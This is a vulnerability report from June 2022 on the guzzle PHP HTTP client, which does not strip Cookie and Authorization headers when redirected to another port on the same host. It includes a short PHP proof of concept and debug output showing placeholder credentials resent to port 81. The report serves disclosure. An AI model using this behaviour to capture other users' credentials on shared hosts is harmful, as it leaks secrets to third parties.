Sensitive header uncleared on same-host, cross-port redirect in guzzle/guzzle
Jun 10th 2022
Sensitive headers are uncleared on cross-port redirect
Proof of Concept
require 'vendor/autoload.php'; use GuzzleHttp\Client; $client = new Client([ 'base_uri' => 'http://10.0.2.4', ]); $response = $client->get('/redirect.php', [ 'debug' => TRUE, 'headers' => [ 'Content-Type' => 'application/x-www-form-urlencoded', 'Cookie' => 'a=b', 'Authorization' => 'secret', ] ]); $body = $response->getBody();
See that the headers are also sent from port 80 to port 81.
* Trying 10.0.2.4:80... * TCP_NODELAY set * Connected to 10.0.2.4 (10.0.2.4) port 80 (#0) > GET /redirect.php HTTP/1.1 Host: 10.0.2.4 User-Agent: GuzzleHttp/7 Content-Type: application/x-www-form-urlencoded Cookie: a=b Authorization: secret * Mark bundle as not supporting multiuse < HTTP/1.1 302 Found < Date: Fri, 10 Jun 2022 14:58:01 GMT < Server: Apache/2.4.53 (Debian) < Location: http://10.0.2.4:81 < Content-Length: 0 < Content-Type: text/html; charset=UTF-8 < * Connection #0 to host 10.0.2.4 left intact * Trying 10.0.2.4:81... * TCP_NODELAY set * Connected to 10.0.2.4 (10.0.2.4) port 81 (#1) > GET / HTTP/1.1 Host: 10.0.2.4:81 User-Agent: GuzzleHttp/7 Content-Type: application/x-www-form-urlencoded Cookie: a=b Authorization: secret
There are instances where different people control different ports on the same host. So sending sensitive headers to a different port will result in these headers being leaked to 3rd party as well. For reference, curl versions >= 7.83.0 also clears sensitive headers on cross-port requests.